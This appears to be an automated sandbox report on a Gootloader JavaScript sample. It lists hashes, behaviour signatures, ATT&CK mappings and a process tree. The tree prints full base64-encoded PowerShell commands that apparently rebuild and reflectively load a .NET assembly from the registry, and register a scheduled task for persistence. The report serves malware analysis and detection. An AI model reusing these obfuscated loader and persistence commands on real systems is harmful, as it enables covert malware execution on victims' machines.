be3da69303ecce036c309478131c3bfdc6bc2ce37a2cfd8833fd13cf0413f333

General

Target

gootloader_payload.js
Size

507KB
MD5

87da4e714b2536ff087610bd1d85973f
SHA1

e13af717e348ec5991c8f9a5bcd97fb81c5bb011
SHA256

be3da69303ecce036c309478131c3bfdc6bc2ce37a2cfd8833fd13cf0413f333
SHA512

c3043ad057269896a95881997a0807470ab5ff6e12ca8c4e5481749196064959efea292a2a6d25f3ff69a6623c6731adf939989144021e4e768aa3acd3fea7e1
SSDEEP

6144:D7TnJm/x24+NeRdwDVPcPJwSXYlS9/kN5EJ1aKA5n9SKQoulUIoMoCVca:D7TE/xH+wRdwRPiMmkNzKABAJ1lUeVca

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1336	powershell.exe
2040	powershell.exe
1760	powershell.exe
888	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 532 wrote to memory of 1336	532	wscript.exe	27
PID 532 wrote to memory of 1336	532	wscript.exe	27
PID 532 wrote to memory of 1336	532	wscript.exe	27
PID 532 wrote to memory of 2040	532	wscript.exe	29
PID 532 wrote to memory of 2040	532	wscript.exe	29
PID 532 wrote to memory of 2040	532	wscript.exe	29
PID 1336 wrote to memory of 1760	1336	powershell.exe	31
PID 1336 wrote to memory of 1760	1336	powershell.exe	31
PID 1336 wrote to memory of 1760	1336	powershell.exe	31
PID 1336 wrote to memory of 1760	1336	powershell.exe	31
PID 2040 wrote to memory of 888	2040	powershell.exe	32
PID 2040 wrote to memory of 888	2040	powershell.exe	32
PID 2040 wrote to memory of 888	2040	powershell.exe	32
PID 2040 wrote to memory of 888	2040	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader_payload.js
1⤵
- Suspicious use of WriteProcessMemory
PID:532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" MwA1ADEANAA5ADcA"OAA5ADs"A"c"w"B"sAGUAZQBwACAALQBz"A"CAAN"wA4ADsAJ"ABqA"HQ"APQBHAGUAdAAt"A"EkAdABl"A"G"0AU"ABy"A"G"8"Ac"ABl"AHIAdAB5"ACA"ALQBwAGEA"dABoA"CAAKAAiAG"gAawAiACsAI"gBjAHU"AOgBcAHMAb"wBmA"CIAKwAiAHQAdwAiA"CsA"Ig"BhA"HIAZQB"cAG0AaQBj"ACIA"KwAiAHIAb"wBzACIAK"wAiAG8AZgB0AFwAUABoAG8AbgBlAF"w"AIgArAFsARQBuA"HYAa"QByAG"8AbgB"tA"G"UA"bg"B0"AF0A"OgA6ACg"AIgB1AHM"AZQAiACs"A"IgB"y"AG"4AIgArACIAY"QBtAGU"AI"gApA"CsAIg"AwACI"A"K"QA7AG"Y"Ab"w"B"yAC"A"AKAAk"AH"MAdQBzAD0AMAA7ACQAcwB1AHM"AIAAtAGwAZ"QA"gADcAMAAwADsA"JABzAHUA"cw"ArACsAKQ"B7"AFQ"Ac"gB5"A"HsAJAB"zAG"E"AKwA9"A"C"QAagB0AC4AJABzAHUAc"wB9"AEM"AYQB0AG"MAaAB"7"AH0A"fQA7ACQAcwB"1A"H"MAPQAwAD"sAdwBo"AGkAbABlA"CgAJAB0AHIAdQBlACk"Aew"AkAHMAd"QBzA"C"sAKwA"7A"CQA"a"wBvA"D0AWwBtA"GEAdAB"oA"F"0AOgA6ACg"A"Ig"BzAHE"AIgArA"C"IAcgB0A"CIAKQAo"ACQAc"wB1A"HMAKQA7AGkAZgA"oAC"Q"AawB"vA"CA"A"LQBlAH"E"AI"AAxADAAM"AAwACkA"e"w"B"iAH"IAZQBhAGs"AfQB"9ACQAaABpA"HQAP"QAkAH"MAYQA"u"AHIAZQBwA"Gw"AYQBjA"GUAKAAiACMA"IgAs"ACQ"AawBv"ACkAOw"AkAGUAa"gB2AD"0AWwBi"AH"k"AdABlAFsAXQBdA"DoAOgAoA"C"IAbgBl"ACI"AKwAiA"H"cAI"g"A"pACgA"J"ABoAGkA"dAAuAEwAZQBuAGcAdABoAC8A"Mg"A"p"A"Ds"A"ZgBvAHIA"KAAk"A"HM"Ad"QBzAD0AMAA7ACQA"cwB1AHMAIAAtAGw"A"dAAg"AC"Q"A"aABp"AHQALgBMA"G"UA"bgBn"AHQAaA"A7AC"Q"AcwB1A"H"MAK"wA"9ADIAK"QB7AC"Q"AZ"QBqA"HYAW"w"AkAHMAd"Q"BzAC8AMgB"dAD0AWwBjAG8Ab"gB2AGUAcgB0AF0AOgA6ACgAIgBUA"G8A"QgAiACsAI"gB5AHQAZQAiACkA"KAAkAGgA"aQB"0A"C4AUwB1"A"GI"Ac"wB0AHIAaQB"uAG"cAKA"AkA"HMAdQB"z"ACwAMgApACwAKAAyA"C"oAO"AAp"A"CkAfQB"bAHIAZQBmAGwA"ZQBjAHQAa"QB"vAG4A"LgBh"A"HMAcwBlAG0"AYgBsAHk"A"XQA6ADoAKAAi"AEwA"bwAi"ACsAIgBhAGQAIgApACg"A"J"ABlAGo"AdgAp"ADsA"WwB"PAHAAZQ"B"u"AF0AOg"A6ACgA"Ig"BUAGU"AIgArACIAcw"B"0AC"IA"KQAoA"CkA"O"wA3AD"Q"ANAA0"ADk"AM"QA"3ADIAOw"A=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" N"AA"1ADQANQA"5A"DY"AOQ"A"x"A"D"UAO"w"AkAGMA"c"w"A9ACgAW"wB"EAG"kAYQBnAG4"A"bwBz"AHQAaQBj"AHMA"LgBQAH"IAbwB"jAGUAcwBzAF0AOgA6AEc"AZQB0AEM"A"dQByAHIAZQ"BuAH"QAUABy"AG8AYwBlA"HMAc"wAoACkALg"BNA"GEAa"QBu"AE0A"bwBkAHUAbA"BlAC4ARgBpA"GwA"ZQ"BOA"GEAbQBl"ACkAOwAkAH"YAZ"g"A9"ACIALQB3A"CAAaAAgAC8AYwAgAC"IAKwAkA"GM"AcwAr"ACIA"IAA"iA"CIA"L"wAiAC"IAZQAiACIAIAB"NAHcAQQ"Ax"AEEARAB"FAEEATg"BB"AEE"ANQBBAE"QAYwBB"A"E8A"QQ"B"BAD"UAQ"QBEAHMA"QQ"BjA"HcAQ"gBz"AEEARwBV"AEEAWgBRAEIAd"wBBAEMA"QQBBAEwAUQB"CAHoA"QQBDA"EEAQQ"B"OAHcA"Q"Q"A0A"EEARABzAEE"ASgBBA"EIAc"QB"BAE"gAUQBBAF"AAUQBC"AEgAQQBHAFUAQQBkAEEA"QQB"0"AEE"AR"Q"Br"AE"EAZABBAEIA"bABBAEcAMA"BBAF"U"AQQBCAHkAQQBHADg"AQQBjA"E"EAQgBsAEEAS"ABJAEEAZAB"BAEIANQBBAEMAQ"QBBAEwA"UQ"BCAHcAQQ"BH"AEUAQ"QBkAEE"A"QgBv"AE"E"AQwBBAEEAS"wB"BAEEAaQBBAEc"AZwBBAGE"Ad"wBBAGkAQ"QBDAH"M"AQQ"BJAGcA"QgBq"AEE"ASA"BVAEE"ATwBn"AEIA"Yw"BBAEgA"T"QBBAGIAdwBCAG"0AQ"QBD"AEkAQQB"LA"H"cAQQB"pAEE"A"SABRAEEAZAB3AEE"A"a"QBBAEMAc"wBBAE"k"AZw"BCAGg"AQQB"IAEkAQQBaAFEAQgBjAEEARwAwAEEAYQBRAEIAagBB"AEM"ASQ"BBAEsAdwBB"A"Gk"AQ"QBIAEkAQQBiAHcA"Q"gB6A"EEAQw"BJA"E"EASwB3AEEAa"QB"BAEcAOABBAFo"AZwBCADA"A"QQB"GAHcA"QQ"BVA"EE"AQg"Bv"AE"EA"RwA"4"A"EEAYgBn"AE"IAbABBAEYA"dwBBAEkAZwB"BA"HIAQ"Q"BGAHMA"QQB"SA"FEAQgB1AEEA"SAB"ZA"EEA"YQ"B"R"A"EI"A"eQ"B"B"AEcAOABBAGIAZ"w"BCAHQAQQB"HAFU"AQQBiAGc"AQ"gAw"AEEAR"gAwAEEATwBnA"EEANgBBAEMA"ZwBBAE"k"AZwBC"ADEAQQBIA"E0AQQBaA"FEA"QQBpAEEAQw"BzAEE"A"SQ"Bn"AEIAeQ"B"BAEc"ANABBAEkA"Zw"BBA"HIAQQBDAE"k"AQ"QBZAFEAQg"B0"AEEARw"B"VAEEAS"QB"nA"EEAcABBAEMAcwBBA"EkAZwBBAHcAQQBDAEk"AQ"QBLA"FEAQQA"3AEEAR"wBZAE"E"AYgB"3"AEIAe"QBBAEM"AQ"QBBAEsAQQ"BB"AGsAQ"Q"BIAE"0AQ"QBkAFE"AQg"B6AEEA"RAAwAEE"ATQBB"AEEA"NwBBAE"MAU"QBBAGMAd"wBCA"D"E"A"QQBI"AE0AQQBJAEE"AQQB0AEE"AR"wB3"AEEAWgB"RAEEAZ"wB"B"A"EQAY"wB"BAE"0AQ"QB"BA"HcAQQBEAH"MAQQBKAEEAQgB6AEEA"SA"BV"AEEAYwB"3AEEAcgBBAEMAcwBB"AEsAUQBCADcAQQBGAFEAQQB"jAGcAQgA1"A"EEASABz"AEEASgBBAEIAeg"BBAEcA"RQBB"AEsAdwBBA"DkAQQ"BDAFEAQQB"hA"GcAQ"gAwAEEAQwA0AEEA"SgBBAEI"AegBBA"EgA"VQB"B"AGMAd"wB"C"ADkAQQBFAE0A"QQBZA"F"E"AQ"gAwAEEAR"wB"NA"EEAYQB"BAEIA"NwBBA"EgAMABBAGYAU"QBBADcAQQBDAFEA"Q"QBjAH"c"AQgAxA"EEASA"BN"AEEAUABR"AEE"Adw"BBA"EQAcw"B"B"A"GQAd"wBCAG8AQ"QBHAGsAQ"Q"BiAEE"AQg"BsA"EE"AQ"wBn"AEEASgBBAEI"AM"AB"BAEgA"SQB"BAGQAUQBCAGw"AQQ"BDAGsAQQBlAHc"A"QQBr"AEEA"SA"BNAEEAZ"ABRAE"IAegB"B"AEM"Acw"BB"AEs"AdwB"BADcAQ"QBDAFEAQQB"hAHc"A"Q"g"B2AEEAR"AAwAEEAVwB3AEIA"dABB"AEcAR"QBBAG"QAQ"Q"BC"A"G"8A"QQ"B"GA"DA"AQQBPAGcA"Q"QA2AEEAQ"wBnAEEAS"QB"n"AEIAegBBAE"g"ARQBB"AE"kAZwBB"AHIAQQBDA"E"k"AQQBj"AGcAQ"gA"wAEEAQwBJA"E"EASwB"RAE"E"AbwBB"AEMA"UQ"B"B"AGMAdw"BCADEAQQBIAE0AQQ"BLAFE"AQQA3AEEAR"wBrAEE"AWgBnAEEAbwB"BAEMA"U"QBBA"GEAdwBCAHYAQQB"D"AEE"AQQB"M"AFEAQgBsA"EEASABFAEEA"SQBBAEE"AeABBAE"Q"AQ"QBBAE0"AQ"Q"BB"AHc"AQQBD"AGsA"QQ"BlAHcAQgBpAEEASABJAEEA"WgBRA"EIAaABBAE"cAc"w"BBAGYA"U"QBCAD"kAQQBDAFEA"QQBh"A"EEAQgBwAEEASABR"AEE"AUABRA"EEAawBB"AEgA"TQB"BAFkAUQBBAHUAQQBIA"E"kA"QQBaAFEA"QgB3AE"E"ARwB3AEEAWQBRA"E"IAagBBAEc"AVQBBAEsAQ"QBBAGk"AQQBDAE"0"AQQBJAGcA"QQBzAEE"AQ"wBRAEEA"YQ"B3AEIA"dgBBAEM"Aaw"BBAE8"AdwBB"AG"sA"QQBH"AFUAQ"QBhAGcAQgAyAEEA"RAAwA"EEAVwB3"AEIAaQBBA"EgAawBBAGQ"AQ"QBCAG"wAQQB"GAHMAQQ"B"YAF"E"AQgBkAE"EARABvAEEA"TwBnAEEAb"wB"BAEMASQB"BAG"IAZ"wBC"AGwAQQB"DAEkAQQ"B"LAHcA"QQBp"AEEA"SABj"AEEAS"Q"BnAE"EAcABB"AEMAZwBBAEo"AQQBCAG8AQQBHAGsAQQBkAEEAQQB1A"E"EARQB3AEEA"Wg"BRAE"IAd"QBBAEcA"YwBB"AGQAQQB"CAG"8AQ"QB"DAD"gA"QQB"NAG"cAQQ"Bw"AEE"ARA"BzAEEAWgBnAEI"AdgBBAEgASQB"BAEsA"QQBBAGsAQQBIAE0AQQBk"AF"EAQgB6"A"EE"ARAAwAEEATQB"BAE"EANwBBA"E"MAUQB"BAGMA"dwBCADEAQQB"IAE0AQQBJA"EEAQQ"B0A"EEAR"wB3"AEEAZ"ABBAEEAZwBBA"EMAUQBBAGEA"QQ"BCA"HAAQQBIAF"EA"QQBM"AGcAQgB"NAEE"A"Rw"BVAEE"AYgBnAEI"AbgB"BAEgAU"QBBAGE"AQ"Q"BBA"DcAQQBDAF"E"AQ"Q"BjA"HcAQgAxAE"EAS"ABN"AEEASwB3A"EEAO"Q"B"BAEQA"S"QBBAEsAUQB"CADcA"QQBDAFEA"Q"QBa"AFEAQgBxAE"EA"SABZAEEAV"wB"3"A"EEAawBBAE"gA"TQB"BAG"QAUQ"BCAHoAQQBDA"DgA"QQB"NAGcAQgBkAE"EA"RA"A"wAEEAVwB3AEIAagBBAE"cAOAB"BA"GIAZwBCADIAQ"QBHAFUAQQB"j"AGcAQgAwAE"EAR"g"AwAE"EATwBnAEEANg"BBAEMAZw"BBAEkAZ"wBCAFUAQQB"H"A"Dg"AQQBRAGcAQQBpAEE"AQ"wBzAE"E"A"SQBnAEIA"NQ"BBA"EgAUQBBAFo"AUQB"BAG"kAQQBDAGsAQQ"BLAEEAQQBr"AEE"ARw"BnA"E"EAYQ"BRAEIAM"ABBAEMANAB"BAFUAdwBCAD"EA"Q"QBHAEkAQQBjAH"cAQ"gAw"A"EEASABJ"AEE"AY"Q"BRAEIAdQBBA"Ec"A"Y"wBBAEsAQQ"BBAGsAQQBIAE0A"QQB"kAFEAQgB6AE"E"A"Qw"B"3A"E"EATQ"BnAEEAcAB"B"AE"M"Ad"wB"BAEsA"QQBBA"HkAQQB"D"AG8AQ"QBPAEEA"QQ"Bw"AEEAQ"wB"rAEEAZgBRAEIAYg"BBAEg"AS"QBBAF"oAUQBCA"G0A"QQBHAHc"A"QQ"BaAFEAQgBq"AEEASAB"RAE"EA"YQBRA"EIAdgB"BAEc"A"N"ABBAEwAZwBCA"GgAQQBIAE"0AQQBjAHc"AQgBsAEEARw"Aw"AEEAWQBnA"EIAc"wBBAEgAawBB"AFgAUQBBAD"Y"AQQBEAG8AQQ"BLAE"EAQQBpAEEAR"QB3AEEAYgB3A"EEAaQ"BBAEM"AcwBBAE"kA"ZwBCAG"gAQ"QB"HAF"EAQ"QB"JAGcAQ"Q"Bw"AEEA"QwB"n"AE"EASgBBAEIAbABBAEcA"bw"B"BAGQA"Z"wBBAH"AAQQBEA"H"MAQQBX"AHcAQg"B"QAEE"AS"ABBAEEAWgBRAE"IAdQBBAEYAMABBAE8AZwBBADYA"QQ"BDAGcA"QQBJ"A"GcAQgB"VAEEAR"wBVAEEASQB"n"AE"EAc"gBBAEMASQBBAG"MAdwBCADAA"QQB"DAEkAQ"QBL"AFEAQQBv"AEE"A"QwB"rAEEAT"w"B"3"AEEAMwBB"AEQ"AUQBBAE4"AQQ"BBA"DAAQQ"BE"AGsAQQBN"AFEAQQ"AzAEEA"R"ABJAE"E"ATwB"3AEEAP"Q"AiADsAJABzAG4"AaAA9"ACQA"ZQBuA"H"Y"AOgBVAFMARQB"SAE4AQQBN"A"EU"AOwBSAGUAZw"BpAHMAdABlAHIALQ"BTA"G"MAaA"B"lAGQAdQBsAGUAZA"B"UAGEAcwBrACAAJA"BzA"G"4A"a"A"A"gAC0ASQB"uA"CAAKAB"OAGUAdwAtAFM"A"YwBoA"GUA"ZA"B1A"G"wA"ZQBkAF"QAYQB"zA"GsA"IAAtAEEAYwAgA"Cg"ATgBl"AHc"ALQBTAG"MAaAB"l"AG"QA"d"QBs"AGUAZAB"UAGEAcwBrAEEA"YwB0A"G"k"Abw"BuACAALQBFAC"AAJAB"jAH"M"AI"AAtA"EEAcg"A"gA"CQAd"gBmACkA"IA"A"tA"FQ"Acg"Ag"ACgATgBlAHcALQBTAGMAaA"B"lA"GQA"d"QBsAGU"AZABU"AGE"Acw"BrA"F"QAcgB"pAGcAZw"Bl"A"HIAIAA"tAEEAdABM"ACAA"LQBV"ACAAJ"ABz"AG4"A"aAApACkAO"wA"zAD"Q"AN"w"A"y"ADQ"AMwAyADgANwA"7AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e NAA1ADQANQA5ADYAOQAxADUAOwAkAGMAcwA9ACgAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkAOwAkAHYAZgA9ACIALQB3ACAAaAAgAC8AYwAgACIAKwAkAGMAcwArACIAIAAiACIALwAiACIAZQAiACIAIABNAHcAQQAxAEEARABFAEEATgBBAEEANQBBAEQAYwBBAE8AQQBBADUAQQBEAHMAQQBjAHcAQgBzAEEARwBVAEEAWgBRAEIAdwBBAEMAQQBBAEwAUQBCAHoAQQBDAEEAQQBOAHcAQQA0AEEARABzAEEASgBBAEIAcQBBAEgAUQBBAFAAUQBCAEgAQQBHAFUAQQBkAEEAQQB0AEEARQBrAEEAZABBAEIAbABBAEcAMABBAFUAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABJAEEAZABBAEIANQBBAEMAQQBBAEwAUQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEASwBBAEEAaQBBAEcAZwBBAGEAdwBBAGkAQQBDAHMAQQBJAGcAQgBqAEEASABVAEEATwBnAEIAYwBBAEgATQBBAGIAdwBCAG0AQQBDAEkAQQBLAHcAQQBpAEEASABRAEEAZAB3AEEAaQBBAEMAcwBBAEkAZwBCAGgAQQBIAEkAQQBaAFEAQgBjAEEARwAwAEEAYQBRAEIAagBBAEMASQBBAEsAdwBBAGkAQQBIAEkAQQBiAHcAQgB6AEEAQwBJAEEASwB3AEEAaQBBAEcAOABBAFoAZwBCADAAQQBGAHcAQQBVAEEAQgBvAEEARwA4AEEAYgBnAEIAbABBAEYAdwBBAEkAZwBBAHIAQQBGAHMAQQBSAFEAQgB1AEEASABZAEEAYQBRAEIAeQBBAEcAOABBAGIAZwBCAHQAQQBHAFUAQQBiAGcAQgAwAEEARgAwAEEATwBnAEEANgBBAEMAZwBBAEkAZwBCADEAQQBIAE0AQQBaAFEAQQBpAEEAQwBzAEEASQBnAEIAeQBBAEcANABBAEkAZwBBAHIAQQBDAEkAQQBZAFEAQgB0AEEARwBVAEEASQBnAEEAcABBAEMAcwBBAEkAZwBBAHcAQQBDAEkAQQBLAFEAQQA3AEEARwBZAEEAYgB3AEIAeQBBAEMAQQBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEARAAwAEEATQBBAEEANwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBJAEEAQQB0AEEARwB3AEEAWgBRAEEAZwBBAEQAYwBBAE0AQQBBAHcAQQBEAHMAQQBKAEEAQgB6AEEASABVAEEAYwB3AEEAcgBBAEMAcwBBAEsAUQBCADcAQQBGAFEAQQBjAGcAQgA1AEEASABzAEEASgBBAEIAegBBAEcARQBBAEsAdwBBADkAQQBDAFEAQQBhAGcAQgAwAEEAQwA0AEEASgBBAEIAegBBAEgAVQBBAGMAdwBCADkAQQBFAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBAGYAUQBBADcAQQBDAFEAQQBjAHcAQgAxAEEASABNAEEAUABRAEEAdwBBAEQAcwBBAGQAdwBCAG8AQQBHAGsAQQBiAEEAQgBsAEEAQwBnAEEASgBBAEIAMABBAEgASQBBAGQAUQBCAGwAQQBDAGsAQQBlAHcAQQBrAEEASABNAEEAZABRAEIAegBBAEMAcwBBAEsAdwBBADcAQQBDAFEAQQBhAHcAQgB2AEEARAAwAEEAVwB3AEIAdABBAEcARQBBAGQAQQBCAG8AQQBGADAAQQBPAGcAQQA2AEEAQwBnAEEASQBnAEIAegBBAEgARQBBAEkAZwBBAHIAQQBDAEkAQQBjAGcAQgAwAEEAQwBJAEEASwBRAEEAbwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBLAFEAQQA3AEEARwBrAEEAWgBnAEEAbwBBAEMAUQBBAGEAdwBCAHYAQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeABBAEQAQQBBAE0AQQBBAHcAQQBDAGsAQQBlAHcAQgBpAEEASABJAEEAWgBRAEIAaABBAEcAcwBBAGYAUQBCADkAQQBDAFEAQQBhAEEAQgBwAEEASABRAEEAUABRAEEAawBBAEgATQBBAFkAUQBBAHUAQQBIAEkAQQBaAFEAQgB3AEEARwB3AEEAWQBRAEIAagBBAEcAVQBBAEsAQQBBAGkAQQBDAE0AQQBJAGcAQQBzAEEAQwBRAEEAYQB3AEIAdgBBAEMAawBBAE8AdwBBAGsAQQBHAFUAQQBhAGcAQgAyAEEARAAwAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQBYAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAGIAZwBCAGwAQQBDAEkAQQBLAHcAQQBpAEEASABjAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAG8AQQBHAGsAQQBkAEEAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDADgAQQBNAGcAQQBwAEEARABzAEEAWgBnAEIAdgBBAEgASQBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEARAAwAEEATQBBAEEANwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBJAEEAQQB0AEEARwB3AEEAZABBAEEAZwBBAEMAUQBBAGEAQQBCAHAAQQBIAFEAQQBMAGcAQgBNAEEARwBVAEEAYgBnAEIAbgBBAEgAUQBBAGEAQQBBADcAQQBDAFEAQQBjAHcAQgAxAEEASABNAEEASwB3AEEAOQBBAEQASQBBAEsAUQBCADcAQQBDAFEAQQBaAFEAQgBxAEEASABZAEEAVwB3AEEAawBBAEgATQBBAGQAUQBCAHoAQQBDADgAQQBNAGcAQgBkAEEARAAwAEEAVwB3AEIAagBBAEcAOABBAGIAZwBCADIAQQBHAFUAQQBjAGcAQgAwAEEARgAwAEEATwBnAEEANgBBAEMAZwBBAEkAZwBCAFUAQQBHADgAQQBRAGcAQQBpAEEAQwBzAEEASQBnAEIANQBBAEgAUQBBAFoAUQBBAGkAQQBDAGsAQQBLAEEAQQBrAEEARwBnAEEAYQBRAEIAMABBAEMANABBAFUAdwBCADEAQQBHAEkAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEAQwB3AEEATQBnAEEAcABBAEMAdwBBAEsAQQBBAHkAQQBDAG8AQQBPAEEAQQBwAEEAQwBrAEEAZgBRAEIAYgBBAEgASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAGgAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBLAEEAQQBpAEEARQB3AEEAYgB3AEEAaQBBAEMAcwBBAEkAZwBCAGgAQQBHAFEAQQBJAGcAQQBwAEEAQwBnAEEASgBBAEIAbABBAEcAbwBBAGQAZwBBAHAAQQBEAHMAQQBXAHcAQgBQAEEASABBAEEAWgBRAEIAdQBBAEYAMABBAE8AZwBBADYAQQBDAGcAQQBJAGcAQgBVAEEARwBVAEEASQBnAEEAcgBBAEMASQBBAGMAdwBCADAAQQBDAEkAQQBLAFEAQQBvAEEAQwBrAEEATwB3AEEAMwBBAEQAUQBBAE4AQQBBADAAQQBEAGsAQQBNAFEAQQAzAEEARABJAEEATwB3AEEAPQAiADsAJABzAG4AaAA9ACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAJABzAG4AaAAgAC0ASQBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFACAAJABjAHMAIAAtAEEAcgAgACQAdgBmACkAIAAtAFQAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMACAALQBVACAAJABzAG4AaAApACkAOwAzADQANwAyADQAMwAyADgANwA7AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b70c50a66b741526c5a73d189b449278

SHA1
e1795a42e8ce8ddaea0909ca77c984bd3b31872c

SHA256
a31eb5d95266a03ae64cefcd74ad31b82b29b13b3dc9e7d59955fee1e602025b

SHA512
202730eda1993d659ebb50d312cb7db90ce35c4db9e8b5d071334cff92f22fa1aa5196509bcf16111b78c5e95f0d6c221e4b4b44d1bf66dd97b2bffe3f58b2ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
